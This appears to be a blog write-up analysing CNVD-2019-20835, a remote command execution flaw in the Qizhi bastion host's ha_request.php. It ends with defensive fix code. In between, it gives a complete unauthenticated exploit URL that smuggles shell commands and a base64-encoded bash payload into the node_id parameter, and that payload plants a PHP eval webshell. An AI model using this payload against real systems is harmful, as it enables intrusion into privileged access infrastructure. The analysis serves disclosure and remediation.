Qizhi bastion host remote command execution vulnerability (CNVD-2019-20835) analysis

First, basic information

  Vulnerability Announcement: https://www.cnvd.org.cn/flaw/show/1632201

  Patch information: a fix for this vulnerability has been released. Customers who have not yet applied the patch can contact Qizhi Technology technical support for specific help.

Second, source code analysis

  The problem is in the file ha_request.php, in the exec() call on line 37 (Figure 1): the $url variable passed to it is user-controllable, as lines 33 and 34 show. Look first at lines 23 and 24: as long as node_request() returns "OK", the fatal() function is skipped (fatal() is a custom function whose role is similar to PHP's built-in exit()) and execution continues downward.

  The node_request() function is defined in include/common.php (Figure 2). Its intended logic is to request $url and return the response. The URL is built as $url = "http://$req_ipaddr" . "/listener/$method.php?n=$req_node_id&a=" . urlencode(json_encode($args)); so $url takes values like http://10.20.10.11/listener/cluster_manage.php?n=1&a=%5B%22install%22%5D.

  But $req_ipaddr and $req_node_id both come from user input. So if an attacker controls the server 10.20.10.11 and its listener/cluster_manage.php file simply contains "<?php echo 'OK'; ?>", node_request() returns "OK", fatal() is skipped, and execution continues down to the exec() call.

  Back to the exec() call: its first argument is the string "wget --no-check-certificate http://10.20.10.11/ha_get_install.php?n=$req_node_id -O backup_scripts.tar.bz2", so the payload can only be placed in the $req_node_id variable.

  As Figure 3 shows, $req_ipaddr and $req_node_id actually come from $_REQUEST['ipaddr'] and $_REQUEST['node_id'], which pass through a global filter that deletes certain dangerous characters.

Figure 1

Figure 2

Figure 3

Third, exploitation

  Precondition: no login required

  Exploitation steps:

  First, make http://10.20.10.11/listener/cluster_manage.php return "OK".

  Second, request the following link to get a shell. After it executes successfully, a one-line PHP webshell with the password 10086 is written to /var/www/shterm/resources/qrcode/lbj77.php. The bastion host's IP address is assumed to be 10.20.10.10.

https://10.20.10.10/ha_request.php?action=install&ipaddr=10.20.10.11&node_id=1${IFS}|`echo${IFS}"ZWNobyAnPD9waHAgQGV2YWwoJF9SRVFVRVNUWzEwMDg2XSk7Pz4nPj4vdmFyL3d3dy9zaHRlcm0vcmVzb3VyY2VzL3FyY29kZS9sYmo3Ny5waHAK"|base64${IFS}-d|bash`|${IFS}|echo${IFS}

Fourth, fix suggestions and references

1. Suggested fix

  $node_id should evidently be an integer, so adding the following line of code at the beginning of ha_request.php to filter the variable is enough.

  $node_id = @intval($req_node_id);
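  As an added example (not the vendor's code; function names are assumed), the hardened form of this parameter handling: node_id is validated as a strict positive integer instead of being silently coerced by intval(), ipaddr is accepted only as a literal IP address, and every dynamic piece of the wget command is wrapped in escapeshellarg() before it reaches exec(). The sample inputs are constructed from the addresses in this write-up.

```php
<?php
// Added example, not ha_request.php itself: hardened parameter handling
// for the wget command that this write-up shows being passed to exec().

// Strictly validate node_id as a positive integer. intval("1${IFS}|x")
// would quietly return 1; here any non-integer value is rejected instead,
// so a tampered request fails loudly rather than being partially accepted.
function validate_node_id($raw) {
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

// Accept only a literal IPv4/IPv6 address for ipaddr; hostnames, paths and
// shell metacharacters are refused before the value is used anywhere.
function validate_ipaddr($raw) {
    $ip = filter_var($raw, FILTER_VALIDATE_IP);
    return $ip === false ? null : $ip;
}

// Build the command line (assumed helper name). Even validated values are
// wrapped in escapeshellarg() so the shell can never parse them as syntax.
function build_install_command($ipaddr, $node_id) {
    $ip = validate_ipaddr($ipaddr);
    $id = validate_node_id($node_id);
    if ($ip === null || $id === null) {
        throw new InvalidArgumentException('invalid ipaddr or node_id');
    }
    $url = sprintf('http://%s/ha_get_install.php?n=%d', $ip, $id);
    return 'wget --no-check-certificate ' . escapeshellarg($url)
         . ' -O ' . escapeshellarg('backup_scripts.tar.bz2');
}

// Constructed inputs: the well-formed request succeeds, the tampered one is refused.
echo build_install_command('10.20.10.11', '1'), "\n";
try {
    build_install_command('10.20.10.11', '1${IFS}|x');   // shell syntax smuggled into node_id
} catch (InvalidArgumentException $e) {
    echo "rejected: ", $e->getMessage(), "\n";
}
```

  Rejecting rather than coercing also gives the request handler a clean place to log the bad input, which is the signal a detection rule for this bug would key on.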

2. References

  https://www.php.net/manual/en/function.exec.php

  https://www.anquanke.com/post/id/84920


Source: www.cnblogs.com/StudyCat/p/11256944.html